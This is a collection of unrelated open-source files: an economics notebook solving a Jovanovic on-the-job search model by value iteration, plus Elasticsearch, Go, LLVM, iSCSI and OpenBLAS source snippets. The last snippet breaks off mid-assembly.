"cell_type": "markdown",
"metadata": {},
"source": [
"### Model Features\n",
"\n",
"\n",
"<a id='index-2'></a>\n",
"- job-specific human capital accumulation combined with on-the-job search \n",
"- infinite-horizon dynamic programming with one state variable and two controls "
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Model\n",
"\n",
"\n",
"<a id='index-3'></a>\n",
"Let $ x_t $ denote the time-$ t $ job-specific human capital of a worker employed at a given firm and let $ w_t $ denote current wages.\n",
"\n",
"Let $ w_t = x_t(1 - s_t - \\phi_t) $, where\n",
"\n",
"- $ \\phi_t $ is investment in job-specific human capital for the current role and \n",
"- $ s_t $ is search effort, devoted to obtaining new offers from other firms. \n",
"\n",
"\n",
"For as long as the worker remains in the current job, evolution of $ \\{x_t\\} $ is given by $ x_{t+1} = g(x_t, \\phi_t) $.\n",
"\n",
"When search effort at $ t $ is $ s_t $, the worker receives a new job offer with probability $ \\pi(s_t) \\in [0, 1] $.\n",
"\n",
"The value of the offer, measured in job-specific human capital, is $ u_{t+1} $, where $ \\{u_t\\} $ is IID with common distribution $ f $.\n",
"\n",
"The worker can reject the current offer and continue with existing job.\n",
"\n",
"Hence $ x_{t+1} = u_{t+1} $ if he/she accepts and $ x_{t+1} = g(x_t, \\phi_t) $ otherwise.\n",
"\n",
"Let $ b_{t+1} \\in \\{0,1\\} $ be a binary random variable, where $ b_{t+1} = 1 $ indicates that the worker receives an offer at the end of time $ t $.\n",
"\n",
"We can write\n",
"\n",
"\n",
"<a id='equation-jd'></a>\n",
"$$\n",
"x_{t+1}\n",
"= (1 - b_{t+1}) g(x_t, \\phi_t) + b_{t+1}\n",
" \\max \\{ g(x_t, \\phi_t), u_{t+1}\\} \\tag{1}\n",
"$$\n",
"\n",
"Agent’s objective: maximize expected discounted sum of wages via controls $ \\{s_t\\} $ and $ \\{\\phi_t\\} $.\n",
"\n",
"Taking the expectation of $ v(x_{t+1}) $ and using [(1)](#equation-jd),\n",
"the Bellman equation for this problem can be written as\n",
"\n",
"\n",
"<a id='equation-jvbell'></a>\n",
"$$\n",
"v(x)\n",
"= \\max_{s + \\phi \\leq 1}\n",
" \\left\\{\n",
" x (1 - s - \\phi) + \\beta (1 - \\pi(s)) v[g(x, \\phi)] +\n",
" \\beta \\pi(s) \\int v[g(x, \\phi) \\vee u] f(du)\n",
" \\right\\} \\tag{2}\n",
"$$\n",
"\n",
"Here nonnegativity of $ s $ and $ \\phi $ is understood, while\n",
"$ a \\vee b := \\max\\{a, b\\} $."
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Parameterization\n",
"\n",
"\n",
"<a id='index-4'></a>\n",
"In the implementation below, we will focus on the parameterization\n",
"\n",
"$$\n",
"g(x, \\phi) = A (x \\phi)^{\\alpha},\n",
"\\quad\n",
"\\pi(s) = \\sqrt s\n",
"\\quad \\text{and} \\quad\n",
"f = \\text{Beta}(2, 2)\n",
"$$\n",
"\n",
"with default parameter values\n",
"\n",
"- $ A = 1.4 $ \n",
"- $ \\alpha = 0.6 $ \n",
"- $ \\beta = 0.96 $ \n",
"\n",
"\n",
"The $ \\text{Beta}(2,2) $ distribution is supported on $ (0,1) $ - it has a unimodal, symmetric density peaked at 0.5.\n",
"\n",
"\n",
"<a id='jvboecalc'></a>"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Back-of-the-Envelope Calculations\n",
"\n",
"Before we solve the model, let’s make some quick calculations that\n",
"provide intuition on what the solution should look like.\n",
"\n",
"To begin, observe that the worker has two instruments to build\n",
"capital and hence wages:\n",
"\n",
"1. invest in capital specific to the current job via $ \\phi $ \n",
"1. search for a new job with better job-specific capital match via $ s $ \n",
"\n",
"\n",
"Since wages are $ x (1 - s - \\phi) $, marginal cost of investment via either $ \\phi $ or $ s $ is identical.\n",
"\n",
"Our risk-neutral worker should focus on whatever instrument has the highest expected return.\n",
"\n",
"The relative expected return will depend on $ x $.\n",
"\n",
"For example, suppose first that $ x = 0.05 $\n",
"\n",
"- If $ s=1 $ and $ \\phi = 0 $, then since $ g(x,\\phi) = 0 $,\n",
" taking expectations of [(1)](#equation-jd) gives expected next period capital equal to $ \\pi(s) \\mathbb{E} u\n",
" = \\mathbb{E} u = 0.5 $. \n",
"- If $ s=0 $ and $ \\phi=1 $, then next period capital is $ g(x, \\phi) = g(0.05, 1) \\approx 0.23 $. \n",
"\n",
"\n",
"Both rates of return are good, but the return from search is better.\n",
"\n",
"Next, suppose that $ x = 0.4 $\n",
"\n",
"- If $ s=1 $ and $ \\phi = 0 $, then expected next period capital is again $ 0.5 $ \n",
"- If $ s=0 $ and $ \\phi = 1 $, then $ g(x, \\phi) = g(0.4, 1) \\approx 0.8 $ \n",
"\n",
"\n",
"Return from investment via $ \\phi $ dominates expected return from search.\n",
"\n",
"Combining these observations gives us two informal predictions:\n",
"\n",
"1. At any given state $ x $, the two controls $ \\phi $ and $ s $ will\n",
" function primarily as substitutes — worker will focus on whichever instrument has the higher expected return. \n",
"1. For sufficiently small $ x $, search will be preferable to investment in\n",
" job-specific human capital. For larger $ x $, the reverse will be true. \n",
"\n",
"\n",
"Now let’s turn to implementation, and see if we can match our predictions."
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Implementation\n",
"\n",
"\n",
"<a id='index-5'></a>\n",
"We will set up a class `JVWorker` that holds the parameters of the model described above"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"class JVWorker:\n",
" r\"\"\"\n",
" A Jovanovic-type model of employment with on-the-job search.\n",
"\n",
" \"\"\"\n",
"\n",
" def __init__(self,\n",
" A=1.4,\n",
" α=0.6,\n",
" β=0.96, # Discount factor\n",
" π=np.sqrt, # Search effort function\n",
" a=2, # Parameter of f\n",
" b=2, # Parameter of f\n",
" grid_size=50,\n",
" mc_size=100,\n",
" ɛ=1e-4):\n",
"\n",
" self.A, self.α, self.β, self.π = A, α, β, π\n",
" self.mc_size, self.ɛ = mc_size, ɛ\n",
"\n",
" self.g = njit(lambda x, ϕ: A * (x * ϕ)**α) # Transition function\n",
" self.f_rvs = np.random.beta(a, b, mc_size)\n",
"\n",
" # Max of grid is the max of a large quantile value for f and the\n",
" # fixed point y = g(y, 1)\n",
" ɛ = 1e-4\n",
" grid_max = max(A**(1 / (1 - α)), stats.beta(a, b).ppf(1 - ɛ))\n",
"\n",
" # Human capital\n",
" self.x_grid = np.linspace(ɛ, grid_max, grid_size)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"The function `operator_factory` takes an instance of this class and returns a\n",
"jitted version of the Bellman operator `T`, ie.\n",
"\n",
"$$\n",
"Tv(x)\n",
"= \\max_{s + \\phi \\leq 1} w(s, \\phi)\n",
"$$\n",
"\n",
"where\n",
"\n",
"\n",
"<a id='equation-defw'></a>\n",
"$$\n",
"w(s, \\phi)\n",
" := x (1 - s - \\phi) + \\beta (1 - \\pi(s)) v[g(x, \\phi)] +\n",
" \\beta \\pi(s) \\int v[g(x, \\phi) \\vee u] f(du) \\tag{3}\n",
"$$\n",
"\n",
"When we represent $ v $, it will be with a NumPy array `v` giving values on grid `x_grid`.\n",
"\n",
"But to evaluate the right-hand side of [(3)](#equation-defw), we need a function, so\n",
"we replace the arrays `v` and `x_grid` with a function `v_func` that gives linear\n",
"interpolation of `v` on `x_grid`.\n",
"\n",
"Inside the `for` loop, for each `x` in the grid over the state space, we\n",
"set up the function $ w(z) = w(s, \\phi) $ defined in [(3)](#equation-defw).\n",
"\n",
"The function is maximized over all feasible $ (s, \\phi) $ pairs.\n",
"\n",
"Another function, `get_greedy` returns the optimal choice of $ s $ and $ \\phi $\n",
"at each $ x $, given a value function."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"def operator_factory(jv, parallel_flag=True):\n",
"\n",
" \"\"\"\n",
" Returns a jitted version of the Bellman operator T\n",
"\n",
" jv is an instance of JVWorker\n",
"\n",
" \"\"\"\n",
"\n",
" π, β = jv.π, jv.β\n",
" x_grid, ɛ, mc_size = jv.x_grid, jv.ɛ, jv.mc_size\n",
" f_rvs, g = jv.f_rvs, jv.g\n",
"\n",
" @njit\n",
" def objective(z, x, v):\n",
" s, ϕ = z\n",
" v_func = lambda x: interp(x_grid, v, x)\n",
"\n",
" integral = 0\n",
" for m in range(mc_size):\n",
" u = f_rvs[m]\n",
" integral += v_func(max(g(x, ϕ), u))\n",
" integral = integral / mc_size\n",
"\n",
" q = π(s) * integral + (1 - π(s)) * v_func(g(x, ϕ))\n",
" return x * (1 - ϕ - s) + β * q\n",
"\n",
" @njit(parallel=parallel_flag)\n",
" def T(v):\n",
" \"\"\"\n",
" The Bellman operator\n",
" \"\"\"\n",
"\n",
" v_new = np.empty_like(v)\n",
" for i in prange(len(x_grid)):\n",
" x = x_grid[i]\n",
"\n",
" # Search on a grid\n",
" search_grid = np.linspace(ɛ, 1, 15)\n",
" max_val = -1\n",
" for s in search_grid:\n",
" for ϕ in search_grid:\n",
" current_val = objective((s, ϕ), x, v) if s + ϕ <= 1 else -1\n",
" if current_val > max_val:\n",
" max_val = current_val\n",
" v_new[i] = max_val\n",
"\n",
" return v_new\n",
"\n",
" @njit\n",
" def get_greedy(v):\n",
" \"\"\"\n",
" Computes the v-greedy policy of a given function v\n",
" \"\"\"\n",
" s_policy, ϕ_policy = np.empty_like(v), np.empty_like(v)\n",
"\n",
" for i in range(len(x_grid)):\n",
" x = x_grid[i]\n",
" # Search on a grid\n",
" search_grid = np.linspace(ɛ, 1, 15)\n",
" max_val = -1\n",
" for s in search_grid:\n",
" for ϕ in search_grid:\n",
" current_val = objective((s, ϕ), x, v) if s + ϕ <= 1 else -1\n",
" if current_val > max_val:\n",
" max_val = current_val\n",
" max_s, max_ϕ = s, ϕ\n",
" s_policy[i], ϕ_policy[i] = max_s, max_ϕ\n",
" return s_policy, ϕ_policy\n",
"\n",
" return T, get_greedy"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"To solve the model, we will write a function that uses the Bellman operator\n",
"and iterates to find a fixed point."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"def solve_model(jv,\n",
" use_parallel=True,\n",
" tol=1e-4,\n",
" max_iter=1000,\n",
" verbose=True,\n",
" print_skip=25):\n",
"\n",
" \"\"\"\n",
" Solves the model by value function iteration\n",
"\n",
" * jv is an instance of JVWorker\n",
"\n",
" \"\"\"\n",
"\n",
" T, _ = operator_factory(jv, parallel_flag=use_parallel)\n",
"\n",
" # Set up loop\n",
" v = jv.x_grid * 0.5 # Initial condition\n",
" i = 0\n",
" error = tol + 1\n",
"\n",
" while i < max_iter and error > tol:\n",
" v_new = T(v)\n",
" error = np.max(np.abs(v - v_new))\n",
" i += 1\n",
" if verbose and i % print_skip == 0:\n",
" print(f\"Error at iteration {i} is {error}.\")\n",
" v = v_new\n",
"\n",
" if i == max_iter:\n",
" print(\"Failed to converge!\")\n",
"\n",
" if verbose and i < max_iter:\n",
" print(f\"\\nConverged in {i} iterations.\")\n",
"\n",
" return v_new"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Solving for Policies\n",
"\n",
"\n",
"<a id='index-6'></a>\n",
"Let’s generate the optimal policies and see what they look like.\n",
"\n",
"\n",
"<a id='jv-policies'></a>"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"jv = JVWorker()\n",
"T, get_greedy = operator_factory(jv)\n",
"v_star = solve_model(jv)\n",
"s_star, ϕ_star = get_greedy(v_star)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"Here are the plots:"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"plots = [s_star, ϕ_star, v_star]\n",
"titles = [\"s policy\", \"ϕ policy\", \"value function\"]\n",
"\n",
"fig, axes = plt.subplots(3, 1, figsize=(12, 12))\n",
"\n",
"for ax, plot, title in zip(axes, plots, titles):\n",
" ax.plot(jv.x_grid, plot)\n",
" ax.set(title=title)\n",
" ax.grid()\n",
"\n",
"axes[-1].set_xlabel(\"x\")\n",
"plt.show()"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"The horizontal axis is the state $ x $, while the vertical axis gives $ s(x) $ and $ \\phi(x) $.\n",
"\n",
"Overall, the policies match well with our predictions from [above](#jvboecalc)\n",
"\n",
"- Worker switches from one investment strategy to the other depending on relative return. \n",
"- For low values of $ x $, the best option is to search for a new job. \n",
"- Once $ x $ is larger, worker does better by investing in human capital specific to the current position. "
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Exercises\n",
"\n",
"\n",
"<a id='jv-ex1'></a>"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Exercise 1\n",
"\n",
"Let’s look at the dynamics for the state process $ \\{x_t\\} $ associated with these policies.\n",
"\n",
"The dynamics are given by [(1)](#equation-jd) when $ \\phi_t $ and $ s_t $ are\n",
"chosen according to the optimal policies, and $ \\mathbb{P}\\{b_{t+1} = 1\\}\n",
"= \\pi(s_t) $.\n",
"\n",
"Since the dynamics are random, analysis is a bit subtle.\n",
"\n",
"One way to do it is to plot, for each $ x $ in a relatively fine grid\n",
"called `plot_grid`, a\n",
"large number $ K $ of realizations of $ x_{t+1} $ given $ x_t =\n",
"x $.\n",
"\n",
"Plot this with one dot for each realization, in the form of a 45 degree\n",
"diagram, setting"
]
},
{
"cell_type": "markdown",
"metadata": {
"hide-output": false
},
"source": [
"```python3\n",
"jv = JVWorker(grid_size=25, mc_size=50)\n",
"plot_grid_max, plot_grid_size = 1.2, 100\n",
"plot_grid = np.linspace(0, plot_grid_max, plot_grid_size)\n",
"fig, ax = plt.subplots()\n",
"ax.set_xlim(0, plot_grid_max)\n",
"ax.set_ylim(0, plot_grid_max)\n",
"```\n"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"By examining the plot, argue that under the optimal policies, the state\n",
"$ x_t $ will converge to a constant value $ \\bar x $ close to unity.\n",
"\n",
"Argue that at the steady state, $ s_t \\approx 0 $ and $ \\phi_t \\approx 0.6 $.\n",
"\n",
"\n",
"<a id='jv-ex2'></a>"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Exercise 2\n",
"\n",
"In the preceding exercise, we found that $ s_t $ converges to zero\n",
"and $ \\phi_t $ converges to about 0.6.\n",
"\n",
"Since these results were calculated at a value of $ \\beta $ close to\n",
"one, let’s compare them to the best choice for an *infinitely* patient worker.\n",
"\n",
"Intuitively, an infinitely patient worker would like to maximize steady state\n",
"wages, which are a function of steady state capital.\n",
"\n",
"You can take it as given—it’s certainly true—that the infinitely patient worker does not\n",
"search in the long run (i.e., $ s_t = 0 $ for large $ t $).\n",
"\n",
"Thus, given $ \\phi $, steady state capital is the positive fixed point\n",
"$ x^*(\\phi) $ of the map $ x \\mapsto g(x, \\phi) $.\n",
"\n",
"Steady state wages can be written as $ w^*(\\phi) = x^*(\\phi) (1 - \\phi) $.\n",
"\n",
"Graph $ w^*(\\phi) $ with respect to $ \\phi $, and examine the best\n",
"choice of $ \\phi $.\n",
"\n",
"Can you give a rough interpretation for the value that you see?"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Solutions"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Exercise 1\n",
"\n",
"Here’s code to produce the 45 degree diagram"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"jv = JVWorker(grid_size=25, mc_size=50)\n",
"π, g, f_rvs, x_grid = jv.π, jv.g, jv.f_rvs, jv.x_grid\n",
"T, get_greedy = operator_factory(jv)\n",
"v_star = solve_model(jv, verbose=False)\n",
"s_policy, ϕ_policy = get_greedy(v_star)\n",
"\n",
"# Turn the policy function arrays into actual functions\n",
"s = lambda y: interp(x_grid, s_policy, y)\n",
"ϕ = lambda y: interp(x_grid, ϕ_policy, y)\n",
"\n",
"def h(x, b, u):\n",
" return (1 - b) * g(x, ϕ(x)) + b * max(g(x, ϕ(x)), u)\n",
"\n",
"\n",
"plot_grid_max, plot_grid_size = 1.2, 100\n",
"plot_grid = np.linspace(0, plot_grid_max, plot_grid_size)\n",
"fig, ax = plt.subplots(figsize=(8, 8))\n",
"ticks = (0.25, 0.5, 0.75, 1.0)\n",
"ax.set(xticks=ticks, yticks=ticks,\n",
" xlim=(0, plot_grid_max),\n",
" ylim=(0, plot_grid_max),\n",
" xlabel='$x_t$', ylabel='$x_{t+1}$')\n",
"\n",
"ax.plot(plot_grid, plot_grid, 'k--', alpha=0.6) # 45 degree line\n",
"for x in plot_grid:\n",
" for i in range(jv.mc_size):\n",
" b = 1 if np.random.uniform(0, 1) < π(s(x)) else 0\n",
" u = f_rvs[i]\n",
" y = h(x, b, u)\n",
" ax.plot(x, y, 'go', alpha=0.25)\n",
"\n",
"plt.show()"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"Looking at the dynamics, we can see that\n",
"\n",
"- If $ x_t $ is below about 0.2 the dynamics are random, but\n",
" $ x_{t+1} > x_t $ is very likely. \n",
"- As $ x_t $ increases the dynamics become deterministic, and\n",
" $ x_t $ converges to a steady state value close to 1. \n",
"\n",
"\n",
"Referring back to the figure [here](#jv-policies) we see that $ x_t \\approx 1 $ means that\n",
"$ s_t = s(x_t) \\approx 0 $ and\n",
"$ \\phi_t = \\phi(x_t) \\approx 0.6 $."
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Exercise 2\n",
"\n",
"The figure can be produced as follows"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"hide-output": false
},
"outputs": [],
"source": [
"jv = JVWorker()\n",
"\n",
"def xbar(ϕ):\n",
" A, α = jv.A, jv.α\n",
" return (A * ϕ**α)**(1 / (1 - α))\n",
"\n",
"ϕ_grid = np.linspace(0, 1, 100)\n",
"fig, ax = plt.subplots(figsize=(9, 7))\n",
"ax.set(xlabel='$\\phi$')\n",
"ax.plot(ϕ_grid, [xbar(ϕ) * (1 - ϕ) for ϕ in ϕ_grid], label='$w^*(\\phi)$')\n",
"ax.legend()\n",
"\n",
"plt.show()"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"Observe that the maximizer is around 0.6.\n",
"\n",
"This is similar to the long-run value for $ \\phi $ obtained in\n",
"exercise 1.\n",
"\n",
"Hence the behavior of the infinitely patent worker is similar to that\n",
"of the worker with $ \\beta = 0.96 $.\n",
"\n",
"This seems reasonable and helps us confirm that our dynamic programming\n",
"solutions are probably correct."
]
}
],
"metadata": {
"date": 1584334741.697839,
"filename": "jv.rst",
"kernelspec": {
"display_name": "Python",
"language": "python3",
"name": "python3"
},
"title": "Job Search VII: On-the-Job Search"
},
"nbformat": 4,
"nbformat_minor": 2
} | {
"pile_set_name": "Github"
} |
are_mergeable 0 0 FALSE
are_mergeable 0 2 FALSE
are_mergeable 0 1 TRUE
are_mergeable 1 0 TRUE
#
are_mergeable 4 4 FALSE
are_mergeable 4 6 FALSE
are_mergeable 4 5 TRUE
are_mergeable 5 4 TRUE
#
merge 4 5 7
#
are_mergeable 8 9 FALSE
are_mergeable 8 10 FALSE
are_mergeable 8 11 FALSE
are_mergeable 9 12 FALSE
are_mergeable 9 13 FALSE
are_mergeable 11 13 FALSE
are_mergeable 10 13 FALSE
are_mergeable 11 12 FALSE
are_mergeable 10 12 FALSE
are_mergeable 10 11 TRUE
are_mergeable 12 13 TRUE
merge 10 11 8
merge 12 13 9
merge 14 15 8
merge 16 17 9
| {
"pile_set_name": "Github"
} |
/*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License;
* you may not use this file except in compliance with the Elastic License.
*/
package org.elasticsearch.xpack.ml;
import org.elasticsearch.action.ActionListener;
import org.elasticsearch.action.ActionRequest;
import org.elasticsearch.action.ActionResponse;
import org.elasticsearch.action.support.ActionFilters;
import org.elasticsearch.action.support.TransportAction;
import org.elasticsearch.common.breaker.NoopCircuitBreaker;
import org.elasticsearch.common.inject.Inject;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.license.LicenseService;
import org.elasticsearch.license.XPackLicenseState;
import org.elasticsearch.plugins.ActionPlugin;
import org.elasticsearch.plugins.Plugin;
import org.elasticsearch.tasks.Task;
import org.elasticsearch.transport.TransportService;
import org.elasticsearch.xpack.core.LocalStateCompositeXPackPlugin;
import org.elasticsearch.xpack.core.rollup.action.GetRollupIndexCapsAction;
import org.elasticsearch.xpack.core.ssl.SSLService;
import org.elasticsearch.xpack.monitoring.Monitoring;
import org.elasticsearch.xpack.security.Security;
import java.nio.file.Path;
import java.util.Collections;
import java.util.HashSet;
import java.util.List;
import static org.elasticsearch.xpack.ml.MachineLearning.TRAINED_MODEL_CIRCUIT_BREAKER_NAME;
public class LocalStateMachineLearning extends LocalStateCompositeXPackPlugin {
public LocalStateMachineLearning(final Settings settings, final Path configPath) throws Exception {
super(settings, configPath);
LocalStateMachineLearning thisVar = this;
MachineLearning plugin = new MachineLearning(settings, configPath){
@Override
protected XPackLicenseState getLicenseState() {
return thisVar.getLicenseState();
}
};
plugin.setCircuitBreaker(new NoopCircuitBreaker(TRAINED_MODEL_CIRCUIT_BREAKER_NAME));
plugins.add(plugin);
plugins.add(new Monitoring(settings) {
@Override
protected SSLService getSslService() {
return thisVar.getSslService();
}
@Override
protected LicenseService getLicenseService() {
return thisVar.getLicenseService();
}
@Override
protected XPackLicenseState getLicenseState() {
return thisVar.getLicenseState();
}
});
plugins.add(new Security(settings, configPath) {
@Override
protected SSLService getSslService() { return thisVar.getSslService(); }
@Override
protected XPackLicenseState getLicenseState() { return thisVar.getLicenseState(); }
});
plugins.add(new MockedRollupPlugin());
}
/**
* This is only required as we now have to have the GetRollupIndexCapsAction as a valid action in our node.
* The MachineLearningLicenseTests attempt to create a datafeed referencing this LocalStateMachineLearning object.
* Consequently, we need to be able to take this rollup action (response does not matter)
* as the datafeed extractor now depends on it.
*/
public static class MockedRollupPlugin extends Plugin implements ActionPlugin {
@Override
public List<ActionHandler<? extends ActionRequest, ? extends ActionResponse>> getActions() {
return Collections.singletonList(
new ActionHandler<>(GetRollupIndexCapsAction.INSTANCE, MockedRollupIndexCapsTransport.class)
);
}
public static class MockedRollupIndexCapsTransport
extends TransportAction<GetRollupIndexCapsAction.Request, GetRollupIndexCapsAction.Response> {
@Inject
public MockedRollupIndexCapsTransport(TransportService transportService) {
super(GetRollupIndexCapsAction.NAME, new ActionFilters(new HashSet<>()), transportService.getTaskManager());
}
@Override
protected void doExecute(Task task,
GetRollupIndexCapsAction.Request request,
ActionListener<GetRollupIndexCapsAction.Response> listener) {
listener.onResponse(new GetRollupIndexCapsAction.Response());
}
}
}
}
| {
"pile_set_name": "Github"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build amd64,freebsd
package unix
import (
"syscall"
"unsafe"
)
func Getpagesize() int { return 4096 }
func TimespecToNsec(ts Timespec) int64 { return int64(ts.Sec)*1e9 + int64(ts.Nsec) }
func NsecToTimespec(nsec int64) (ts Timespec) {
ts.Sec = nsec / 1e9
ts.Nsec = nsec % 1e9
return
}
func NsecToTimeval(nsec int64) (tv Timeval) {
nsec += 999 // round up to microsecond
tv.Usec = nsec % 1e9 / 1e3
tv.Sec = int64(nsec / 1e9)
return
}
func SetKevent(k *Kevent_t, fd, mode, flags int) {
k.Ident = uint64(fd)
k.Filter = int16(mode)
k.Flags = uint16(flags)
}
func (iov *Iovec) SetLen(length int) {
iov.Len = uint64(length)
}
func (msghdr *Msghdr) SetControllen(length int) {
msghdr.Controllen = uint32(length)
}
func (cmsg *Cmsghdr) SetLen(length int) {
cmsg.Len = uint32(length)
}
func sendfile(outfd int, infd int, offset *int64, count int) (written int, err error) {
var writtenOut uint64 = 0
_, _, e1 := Syscall9(SYS_SENDFILE, uintptr(infd), uintptr(outfd), uintptr(*offset), uintptr(count), 0, uintptr(unsafe.Pointer(&writtenOut)), 0, 0, 0)
written = int(writtenOut)
if e1 != 0 {
err = e1
}
return
}
func Syscall9(num, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 uintptr, err syscall.Errno)
| {
"pile_set_name": "Github"
} |
var $ = require('jquery');
$.expr[":"].icontains = $.expr.createPseudo(function (arg) {
return function (elem) {
return $(elem).text().toUpperCase().indexOf(arg.toUpperCase()) >= 0;
};
});
| {
"pile_set_name": "Github"
} |
//===-- WebAssemblyMCInstLower.h - Lower MachineInstr to MCInst -*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
///
/// \file
/// This file declares the class to lower WebAssembly MachineInstrs to
/// their corresponding MCInst records.
///
//===----------------------------------------------------------------------===//
#ifndef LLVM_LIB_TARGET_WEBASSEMBLY_WEBASSEMBLYMCINSTLOWER_H
#define LLVM_LIB_TARGET_WEBASSEMBLY_WEBASSEMBLYMCINSTLOWER_H
#include "llvm/MC/MCInst.h"
#include "llvm/Support/Compiler.h"
namespace llvm {
class WebAssemblyAsmPrinter;
class MCContext;
class MCSymbol;
class MachineInstr;
class MachineOperand;
/// This class is used to lower an MachineInstr into an MCInst.
class LLVM_LIBRARY_VISIBILITY WebAssemblyMCInstLower {
MCContext &Ctx;
WebAssemblyAsmPrinter &Printer;
MCSymbol *GetGlobalAddressSymbol(const MachineOperand &MO) const;
MCSymbol *GetExternalSymbolSymbol(const MachineOperand &MO) const;
MCOperand lowerSymbolOperand(const MachineOperand &MO, MCSymbol *Sym) const;
public:
WebAssemblyMCInstLower(MCContext &ctx, WebAssemblyAsmPrinter &printer)
: Ctx(ctx), Printer(printer) {}
void lower(const MachineInstr *MI, MCInst &OutMI) const;
};
} // end namespace llvm
#endif
| {
"pile_set_name": "Github"
} |
/*
* iSCSI timer
*
* Copyright (C) 2002 Cisco Systems, Inc.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published
* by the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* See the file COPYING included with this distribution for more details.
*/
#include <string.h>
#include <sys/time.h>
void iscsi_timer_clear(struct timeval *timer)
{
memset(timer, 0, sizeof (*timer));
}
/* set timer to now + seconds */
void iscsi_timer_set(struct timeval *timer, int seconds)
{
if (timer) {
memset(timer, 0, sizeof (*timer));
gettimeofday(timer, NULL);
timer->tv_sec += seconds;
}
}
int iscsi_timer_expired(struct timeval *timer)
{
struct timeval now;
/* no timer, can't have expired */
if ((timer == NULL) || ((timer->tv_sec == 0) && (timer->tv_usec == 0)))
return 0;
memset(&now, 0, sizeof (now));
gettimeofday(&now, NULL);
if (now.tv_sec > timer->tv_sec)
return 1;
if ((now.tv_sec == timer->tv_sec) && (now.tv_usec >= timer->tv_usec))
return 1;
return 0;
}
int iscsi_timer_msecs_until(struct timeval *timer)
{
struct timeval now;
int msecs;
long partial;
/* no timer, can't have expired, infinite time til it expires */
if ((timer == NULL) || ((timer->tv_sec == 0) && (timer->tv_usec == 0)))
return -1;
memset(&now, 0, sizeof (now));
gettimeofday(&now, NULL);
/* already expired? */
if (now.tv_sec > timer->tv_sec)
return 0;
if ((now.tv_sec == timer->tv_sec) && (now.tv_usec >= timer->tv_usec))
return 0;
/* not expired yet, do the math */
partial = timer->tv_usec - now.tv_usec;
if (partial < 0) {
partial += 1000 * 1000;
msecs = (partial + 500) / 1000;
msecs += (timer->tv_sec - now.tv_sec - 1) * 1000;
} else {
msecs = (partial + 500) / 1000;
msecs += (timer->tv_sec - now.tv_sec) * 1000;
}
return msecs;
}
| {
"pile_set_name": "Github"
} |
#include "common.h"
#include <stdbool.h>
static void dtrmm_kernel_4x8( BLASLONG n, FLOAT *alpha ,FLOAT *a, FLOAT *b, FLOAT *C0, FLOAT *C1, FLOAT *C2,FLOAT *C3, FLOAT *C4, FLOAT *C5,FLOAT *C6, FLOAT *C7) __attribute__ ((noinline));
static void dtrmm_kernel_4x8( BLASLONG n, FLOAT *alpha ,FLOAT *a, FLOAT *b, FLOAT *C0, FLOAT *C1, FLOAT *C2,FLOAT *C3, FLOAT *C4, FLOAT *C5,FLOAT *C6, FLOAT *C7)
{
BLASLONG i = 0;
BLASLONG temp1 = n * 8;
__asm__ __volatile__
(
" vxorpd %%ymm4 , %%ymm4 , %%ymm4 \n\t"
" vxorpd %%ymm5 , %%ymm5 , %%ymm5 \n\t"
" vxorpd %%ymm6 , %%ymm6 , %%ymm6 \n\t"
" vxorpd %%ymm7 , %%ymm7 , %%ymm7 \n\t"
" vxorpd %%ymm8 , %%ymm8 , %%ymm8 \n\t"
" vxorpd %%ymm9 , %%ymm9 , %%ymm9 \n\t"
" vxorpd %%ymm10, %%ymm10, %%ymm10 \n\t"
" vxorpd %%ymm11, %%ymm11, %%ymm11 \n\t"
" cmp $0, %1 \n\t"
" jz 2f \n\t"
" .p2align 4 \n\t"
"1: \n\t"
" vmovups (%2,%0,4) , %%ymm0 \n\t"
" vmovups (%3,%0,8) , %%ymm1 \n\t"
" vmovups 32(%3,%0,8) , %%ymm2 \n\t"
" vfmadd231pd %%ymm0 , %%ymm1 , %%ymm4 \n\t"
" vfmadd231pd %%ymm0 , %%ymm2 , %%ymm8 \n\t"
